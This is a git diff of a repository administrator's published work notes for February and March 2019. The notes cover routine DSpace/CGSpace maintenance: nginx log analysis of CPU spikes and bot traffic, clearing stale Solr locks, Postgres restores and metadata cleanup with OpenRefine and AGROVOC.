         559 54.70.40.11
    @@ -444,7 +444,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
     
    • Then again this morning another alert:
    -
    # zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "07/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "07/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           5 66.249.66.223
           8 104.198.9.108
          13 110.54.160.222
    @@ -455,7 +455,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
        4529 45.5.186.2
        4661 205.186.128.185
        4661 70.32.83.92
    -# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "07/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "07/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         145 157.55.39.237
         154 66.249.66.221
         214 34.218.226.147
    @@ -513,7 +513,7 @@ Please see the DSpace documentation for assistance.
     
  • Linode sent alerts about CPU load yesterday morning, yesterday night, and this morning! All over 300% CPU load!
  • This is just for this morning:
  • -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "09/Feb/2019:(07|08|09|10|11)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "09/Feb/2019:(07|08|09|10|11)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         289 35.237.175.180
         290 66.249.66.221
         296 18.195.78.144
    @@ -524,7 +524,7 @@ Please see the DSpace documentation for assistance.
         742 5.143.231.38
        1046 5.9.6.51
        1331 66.249.66.219
    -# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "09/Feb/2019:(07|08|09|10|11)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "09/Feb/2019:(07|08|09|10|11)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           4 66.249.83.30
           5 49.149.10.16
           8 207.46.13.64
    @@ -547,7 +547,7 @@ Please see the DSpace documentation for assistance.
     
    • Linode sent another alert about CGSpace (linode18) CPU load this morning, here are the top IPs in the web server XMLUI and API logs before, during, and after that time:
    -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "10/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "10/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         232 18.195.78.144
         238 35.237.175.180
         281 66.249.66.221
    @@ -558,7 +558,7 @@ Please see the DSpace documentation for assistance.
         444 2a01:4f8:140:3192::2
        1171 5.9.6.51
        1196 66.249.66.219
    -# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "10/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "10/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           6 112.203.241.69
           7 157.55.39.149
           9 40.77.167.178
    @@ -572,16 +572,16 @@ Please see the DSpace documentation for assistance.
     
    • Another interesting thing might be the total number of requests for web and API services during that time:
    -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -cE "10/Feb/2019:0(5|6|7|8|9)"
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -cE "10/Feb/2019:0(5|6|7|8|9)"
     16333
    -# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -cE "10/Feb/2019:0(5|6|7|8|9)"
    +# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -cE "10/Feb/2019:0(5|6|7|8|9)"
     15964
     
    • Also, the number of unique IPs served during that time:
    -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "10/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq | wc -l
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "10/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq | wc -l
     1622
    -# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "10/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq | wc -l
    +# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "10/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq | wc -l
     95
     
    • It’s very clear to me now that the API requests are the heaviest!
    • @@ -643,7 +643,7 @@ Please see the DSpace documentation for assistance.
    • On a similar note, I wonder if we could use the performance-focused libvps and the third-party jlibvips Java library in DSpace
    • Testing the vipsthumbnail command line tool with this CGSpace item that uses CMYK:
    -
    $ vipsthumbnail alc_contrastes_desafios.pdf -s 300 -o '%s.jpg[Q=92,optimize_coding,strip]'
    +
    $ vipsthumbnail alc_contrastes_desafios.pdf -s 300 -o '%s.jpg[Q=92,optimize_coding,strip]'
     
    • (DSpace 5 appears to use JPEG 92 quality so I do the same)
    • Thinking about making “top items” endpoints in my dspace-statistics-api
    • @@ -693,7 +693,7 @@ dspacestatistics=# SELECT * FROM items WHERE downloads > 0 ORDER BY downloads
    • Thierry from CTA is having issues with his account on DSpace Test, and there is no admin password reset function on DSpace (only via email, which is disabled on DSpace Test), so I have to delete and re-create his account:
    $ dspace user --delete --email blah@cta.int
    -$ dspace user --add --givenname Thierry --surname Lewyllie --email blah@cta.int --password 'blah'
    +$ dspace user --add --givenname Thierry --surname Lewyllie --email blah@cta.int --password 'blah'
     
    • On this note, I saw a thread on the dspace-tech mailing list that says this functionality exists if you enable webui.user.assumelogin = true
    • I will enable this on CGSpace (#411)
    • @@ -728,14 +728,14 @@ $ podman run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspace
    • After running the playbook CGSpace came back up, but I had an issue with some Solr cores not being loaded (similar to last month) and this was in the Solr log:
    -
    2019-02-14 18:17:31,304 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2018': Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
    +
    2019-02-14 18:17:31,304 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2018': Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
     
    • The issue last month was address space, which is now set as LimitAS=infinity in tomcat7.service
    • I re-ran the Ansible playbook to make sure all configs etc were the, then rebooted the server
    • Still the error persists after reboot
    • I will try to stop Tomcat and then remove the locks manually:
    -
    # find /home/cgspace.cgiar.org/solr/ -iname "write.lock" -delete
    +
    # find /home/cgspace.cgiar.org/solr/ -iname "write.lock" -delete
     
    • After restarting Tomcat the usage statistics are back
    • Interestingly, many of the locks were from last month, last year, and even 2015! I’m pretty sure that’s not supposed to be how locks work…
    • @@ -795,10 +795,10 @@ $ podman volume create dspacedb_data $ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine $ createuser -h localhost -U postgres --pwprompt dspacetest $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;' +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;' $ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost dspace_2019-02-11.backup $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;' +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
    • And it’s all running without root!
    • Then re-create my Artifactory container as well, taking into account ulimit open file requirements by Artifactory as well as the user limitations caused by rootless subuid mappings:
    • @@ -818,12 +818,12 @@ $ podman start artifactory
    • I ran DSpace’s cleanup task on CGSpace (linode18) and there were errors:
    $ dspace cleanup -v
    -Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    -  Detail: Key (bitstream_id)=(162844) is still referenced from table "bundle".
    +Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    +  Detail: Key (bitstream_id)=(162844) is still referenced from table "bundle".
     
    • The solution is, as always:
    -
    $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (162844);'
    +
    $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (162844);'
     UPDATE 1
     
    • I merged the Atmire Metadata Quality Module (MQM) changes to the 5_x-prod branch and deployed it on CGSpace (#407)
    • @@ -834,7 +834,7 @@ UPDATE 1
    • Jesus fucking Christ, Linode sent an alert that CGSpace (linode18) was using 421% CPU for a few hours this afternoon (server time):
    • There seems to have been a lot of activity in XMLUI:
    -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        1236 18.212.208.240
        1276 54.164.83.99
        1277 3.83.14.11
    @@ -845,7 +845,7 @@ UPDATE 1
        1327 52.54.252.47
        1477 5.9.6.51
        1861 94.71.244.172
    -# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           8 42.112.238.64
           9 121.52.152.3
           9 157.55.39.50
    @@ -856,15 +856,15 @@ UPDATE 1
          28 66.249.66.219
          43 34.209.213.122
         178 50.116.102.77
    -# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq | wc -l
    +# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq | wc -l
     2727
    -# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq | wc -l
    +# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq | wc -l
     186
     
    • 94.71.244.172 is in Greece and uses the user agent “Indy Library”
    • At least they are re-using their Tomcat session:
    -
    $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=94.71.244.172' dspace.log.2019-02-18 | sort | uniq | wc -l
    +
    $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=94.71.244.172' dspace.log.2019-02-18 | sort | uniq | wc -l
     
    • The following IPs were all hitting the server hard simultaneously and are located on Amazon and use the user agent “Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0”:

      @@ -886,7 +886,7 @@ UPDATE 1

      For reference most of these IPs hitting the XMLUI this afternoon are on Amazon:

    -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 30
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 30
        1173 52.91.249.23
        1176 107.22.118.106
        1178 3.88.173.152
    @@ -920,7 +920,7 @@ UPDATE 1
     
    • In the case of 52.54.252.47 they are only making about 10 requests per minute during this time (albeit from dozens of concurrent IPs):
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep 52.54.252.47 | grep -o -E '18/Feb/2019:1[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep 52.54.252.47 | grep -o -E '18/Feb/2019:1[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 10
          10 18/Feb/2019:17:20
          10 18/Feb/2019:17:22
          10 18/Feb/2019:17:31
    @@ -935,7 +935,7 @@ UPDATE 1
     
  • As this user agent is not recognized as a bot by DSpace this will definitely fuck up the usage statistics
  • There were 92,000 requests from these IPs alone today!
  • -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -c 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0'
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -c 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0'
     92756
     
    • I will add this user agent to the “badbots” rate limiting in our nginx configuration
    • @@ -943,7 +943,7 @@ UPDATE 1
    • IWMI sent a few new ORCID identifiers for us to add to our controlled vocabulary
    • I will merge them with our existing list and then resolve their names using my resolve-orcids.py script:
    -
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml 2019-02-18-IWMI-ORCID-IDs.txt  | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2019-02-18-combined-orcids.txt
    +
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml 2019-02-18-IWMI-ORCID-IDs.txt  | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2019-02-18-combined-orcids.txt
     $ ./resolve-orcids.py -i /tmp/2019-02-18-combined-orcids.txt -o /tmp/2019-02-18-combined-names.txt -d
     # sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
     $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
    @@ -956,7 +956,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
     
  • Unfortunately, I don’t see any strange activity in the web server API or XMLUI logs at that time in particular
  • So far today the top ten IPs in the XMLUI logs are:
  • -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "19/Feb/2019:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "19/Feb/2019:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
       11541 18.212.208.240
       11560 3.81.136.184
       11562 3.88.237.84
    @@ -978,7 +978,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
     
     
  • The top requests in the API logs today are:
  • -
    # zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "19/Feb/2019:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "19/Feb/2019:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          42 66.249.66.221
          44 156.156.81.215
          55 3.85.54.129
    @@ -999,17 +999,17 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
     
  • I need to follow up with the DSpace developers and Atmire to see how they classify which requests are bots so we can try to estimate the impact caused by these users and perhaps try to update the list to make the stats more accurate
  • I found one IP address in Nigeria that has an Android user agent and has requested a bitstream from 10568/96140 almost 200 times:
  • -
    # grep 41.190.30.105 /var/log/nginx/access.log | grep -c 'acgg_progress_report.pdf'
    +
    # grep 41.190.30.105 /var/log/nginx/access.log | grep -c 'acgg_progress_report.pdf'
     185
     
    • Wow, and another IP in Nigeria made a bunch more yesterday from the same user agent:
    -
    # grep 41.190.3.229 /var/log/nginx/access.log.1 | grep -c 'acgg_progress_report.pdf'
    +
    # grep 41.190.3.229 /var/log/nginx/access.log.1 | grep -c 'acgg_progress_report.pdf'
     346
     
    • In the last two days alone there were 1,000 requests for this PDF, mostly from Nigeria!
    -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep acgg_progress_report.pdf | grep -v 'upstream response is buffered' | awk '{print $1}' | sort | uniq -c | sort -n
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep acgg_progress_report.pdf | grep -v 'upstream response is buffered' | awk '{print $1}' | sort | uniq -c | sort -n
           1 139.162.146.60
           1 157.55.39.159
           1 196.188.127.94
    @@ -1042,9 +1042,9 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
     
  • I told him that they should probably try to use the REST API’s find-by-metadata-field endpoint
  • The annoying thing is that you have to match the text language attribute of the field exactly, but it does work:
  • -
    $ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://cgspace.cgiar.org/rest/items/find-by-metadata-field" -d '{"key": "cg.creator.id","value": "Alan S. Orth: 0000-0002-1735-7458", "language": ""}'
    -$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://cgspace.cgiar.org/rest/items/find-by-metadata-field" -d '{"key": "cg.creator.id","value": "Alan S. Orth: 0000-0002-1735-7458", "language": null}'
    -$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://cgspace.cgiar.org/rest/items/find-by-metadata-field" -d '{"key": "cg.creator.id","value": "Alan S. Orth: 0000-0002-1735-7458", "language": "en_US"}'
    +
    $ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://cgspace.cgiar.org/rest/items/find-by-metadata-field" -d '{"key": "cg.creator.id","value": "Alan S. Orth: 0000-0002-1735-7458", "language": ""}'
    +$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://cgspace.cgiar.org/rest/items/find-by-metadata-field" -d '{"key": "cg.creator.id","value": "Alan S. Orth: 0000-0002-1735-7458", "language": null}'
    +$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://cgspace.cgiar.org/rest/items/find-by-metadata-field" -d '{"key": "cg.creator.id","value": "Alan S. Orth: 0000-0002-1735-7458", "language": "en_US"}'
     
    • This returns six items for me, which is the same I see in a Discovery search
    • Hector Tobon from CIAT asked if it was possible to get item statistics from CGSpace so I told him to use my dspace-statistics-api
    • @@ -1075,7 +1075,7 @@ $ ./agrovoc-lookup.py -l fr -i /tmp/top-1500-subjects.txt -om /tmp/matched-subje
    $ sort /tmp/top-1500-subjects.txt > /tmp/subjects-sorted.txt
     $ comm -13 /tmp/2019-02-21-matched-subjects.txt /tmp/subjects-sorted.txt > /tmp/2019-02-21-unmatched-subjects.txt
    -$ diff --new-line-format="" --unchanged-line-format="" /tmp/subjects-sorted.txt /tmp/2019-02-21-matched-subjects.txt > /tmp/2019-02-21-unmatched-subjects.txt
    +$ diff --new-line-format="" --unchanged-line-format="" /tmp/subjects-sorted.txt /tmp/2019-02-21-matched-subjects.txt > /tmp/2019-02-21-unmatched-subjects.txt
     
    • Generate a list of countries and regions from CGSpace for Sisay to look through:
    @@ -1129,15 +1129,15 @@ import re import urllib import urllib2 -pattern = re.compile('^S[A-Z ]+$') +pattern = re.compile('^S[A-Z ]+$') if pattern.match(value): - url = 'http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=' + urllib.quote_plus(value) + '&lang=en' + url = 'http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=' + urllib.quote_plus(value) + '&lang=en' get = urllib2.urlopen(url) data = json.load(get) - if len(data['results']) == 1: - return "matched" + if len(data['results']) == 1: + return "matched" -return "unmatched" +return "unmatched"
    • You have to make sure to URL encode the value with quote_plus() and it totally works, but it seems to refresh the facets (and therefore re-query everything) when you select a facet so that makes it basically unusable
    • There is a good resource discussing OpenRefine, Jython, and web scraping
    • @@ -1148,16 +1148,16 @@ return "unmatched"
    • I’m not sure how to deal with terms like “CORN” that are alternative labels (altLabel) in AGROVOC where the preferred label (prefLabel) would be “MAIZE”
    • For example, a query for CORN* returns:
    -
        "results": [
    +
        "results": [
             {
    -            "altLabel": "corn (maize)",
    -            "lang": "en",
    -            "prefLabel": "maize",
    -            "type": [
    -                "skos:Concept"
    +            "altLabel": "corn (maize)",
    +            "lang": "en",
    +            "prefLabel": "maize",
    +            "type": [
    +                "skos:Concept"
                 ],
    -            "uri": "http://aims.fao.org/aos/agrovoc/c_12332",
    -            "vocab": "agrovoc"
    +            "uri": "http://aims.fao.org/aos/agrovoc/c_12332",
    +            "vocab": "agrovoc"
             },
     
    • There are dozens of other entries like “corn (soft wheat)”, “corn (zea)”, “corn bran”, “Cornales”, etc that could potentially match and to determine if they are related programatically is difficult
    • @@ -1239,12 +1239,12 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed at org.apache.solr.update.DefaultSolrCoreState.getIndexWriter(DefaultSolrCoreState.java:111) at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1528) ... 33 more -2019-02-25 21:38:14,250 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2015': Unable to create core [statistics-2015] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2015/data/index/write.lock +2019-02-25 21:38:14,250 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2015': Unable to create core [statistics-2015] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2015/data/index/write.lock
    • I tried to shutdown Tomcat and remove the locks:
    # systemctl stop tomcat7
    -# find /home/cgspace.cgiar.org/solr -iname "*.lock" -delete
    +# find /home/cgspace.cgiar.org/solr -iname "*.lock" -delete
     # systemctl start tomcat7
     
    • … but the problem still occurs
    • diff --git a/docs/2019-03/index.html b/docs/2019-03/index.html index 574908e77..3872bc8ec 100644 --- a/docs/2019-03/index.html +++ b/docs/2019-03/index.html @@ -46,7 +46,7 @@ Most worryingly, there are encoding errors in the abstracts for eleven items, fo I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs "/> - + @@ -217,7 +217,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.x
    -
    # journalctl -u tomcat7 | grep -c 'Multiple update components target the same field:solr_update_time_stamp'
    +
    # journalctl -u tomcat7 | grep -c 'Multiple update components target the same field:solr_update_time_stamp'
     1076
     
    • I restarted Tomcat and it’s OK now…
    • @@ -238,13 +238,13 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.x
    • The FireOak report highlights the fact that several CGSpace collections have mixed-content errors due to the use of HTTP links in the Feedburner forms
    • I see 46 occurrences of these with this query:
    -
    dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id in (3,4) AND (text_value LIKE '%http://feedburner.%' OR text_value LIKE '%http://feeds.feedburner.%');
    +
    dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id in (3,4) AND (text_value LIKE '%http://feedburner.%' OR text_value LIKE '%http://feeds.feedburner.%');
     
    • I can replace these globally using the following SQL:
    -
    dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://feedburner.','https//feedburner.', 'g') WHERE resource_type_id in (3,4) AND text_value LIKE '%http://feedburner.%';
    +
    dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://feedburner.','https//feedburner.', 'g') WHERE resource_type_id in (3,4) AND text_value LIKE '%http://feedburner.%';
     UPDATE 43
    -dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://feeds.feedburner.','https//feeds.feedburner.', 'g') WHERE resource_type_id in (3,4) AND text_value LIKE '%http://feeds.feedburner.%';
    +dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://feeds.feedburner.','https//feeds.feedburner.', 'g') WHERE resource_type_id in (3,4) AND text_value LIKE '%http://feeds.feedburner.%';
     UPDATE 44
     
    • I ran the corrections on CGSpace and DSpace Test
    • @@ -254,7 +254,7 @@ UPDATE 44
    • Working on tagging IITA’s items with their new research theme (cg.identifier.iitatheme) based on their existing IITA subjects (see notes from 2019-02)
    • I exported the entire IITA community from CGSpace and then used csvcut to extract only the needed fields:
    -
    $ csvcut -c 'id,cg.subject.iita,cg.subject.iita[],cg.subject.iita[en],cg.subject.iita[en_US]' ~/Downloads/10568-68616.csv > /tmp/iita.csv
    +
    $ csvcut -c 'id,cg.subject.iita,cg.subject.iita[],cg.subject.iita[en],cg.subject.iita[en_US]' ~/Downloads/10568-68616.csv > /tmp/iita.csv
     
    • After importing to OpenRefine I realized that tagging items based on their subjects is tricky because of the row/record mode of OpenRefine when you split the multi-value cells as well as the fact that some items might need to be tagged twice (thus needing a ||)

      @@ -263,7 +263,7 @@ UPDATE 44

      I think it might actually be easier to filter by IITA subject, then by IITA theme (if needed), and then do transformations with some conditional values in GREL expressions like:

    -
    if(isBlank(value), 'PLANT PRODUCTION & HEALTH', value + '||PLANT PRODUCTION & HEALTH')
    +
    if(isBlank(value), 'PLANT PRODUCTION & HEALTH', value + '||PLANT PRODUCTION & HEALTH')
     
    • Then it’s more annoying because there are four IITA subject columns…
    • In total this would add research themes to 1,755 items
    • @@ -288,11 +288,11 @@ UPDATE 44
    • This is a bit ugly, but it works (using the DSpace 5 SQL helper function to resolve ID to handle):
    -
    for id in $(psql -U postgres -d dspacetest -h localhost -c "SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228 AND text_value LIKE '%SWAZILAND%'" | grep -oE '[0-9]{3,}'); do
    +
    for id in $(psql -U postgres -d dspacetest -h localhost -c "SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228 AND text_value LIKE '%SWAZILAND%'" | grep -oE '[0-9]{3,}'); do
     
    -    echo "Getting handle for id: ${id}"
    +    echo "Getting handle for id: ${id}"
     
    -    handle=$(psql -U postgres -d dspacetest -h localhost -c "SELECT ds5_item2itemhandle($id)" | grep -oE '[0-9]{5}/[0-9]+')
    +    handle=$(psql -U postgres -d dspacetest -h localhost -c "SELECT ds5_item2itemhandle($id)" | grep -oE '[0-9]{5}/[0-9]+')
     
         ~/dspace/bin/dspace metadata-export -f /tmp/${id}.csv -i $handle
     
    @@ -300,7 +300,7 @@ done
     
    • Then I couldn’t figure out a clever way to join all the CSVs, so I just grepped them to find the IDs with dates from 2018 and 2019 and there are apparently only three:
    -
    $ grep -oE '201[89]' /tmp/*.csv | sort -u
    +
    $ grep -oE '201[89]' /tmp/*.csv | sort -u
     /tmp/94834.csv:2018
     /tmp/95615.csv:2018
     /tmp/96747.csv:2018
    @@ -326,7 +326,7 @@ java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@55ba10b5 is c
     
    • Interestingly, I see a pattern of these errors increasing, with single and double digit numbers over the past month, but spikes of over 1,000 today, yesterday, and on 2019-03-08, which was exactly the first time we saw this blank page error recently
    -
    $ grep -I 'SQL QueryTable Error' dspace.log.2019-0* | awk -F: '{print $1}' | sort | uniq -c | tail -n 25
    +
    $ grep -I 'SQL QueryTable Error' dspace.log.2019-0* | awk -F: '{print $1}' | sort | uniq -c | tail -n 25
           5 dspace.log.2019-02-27
          11 dspace.log.2019-02-28
          29 dspace.log.2019-03-01
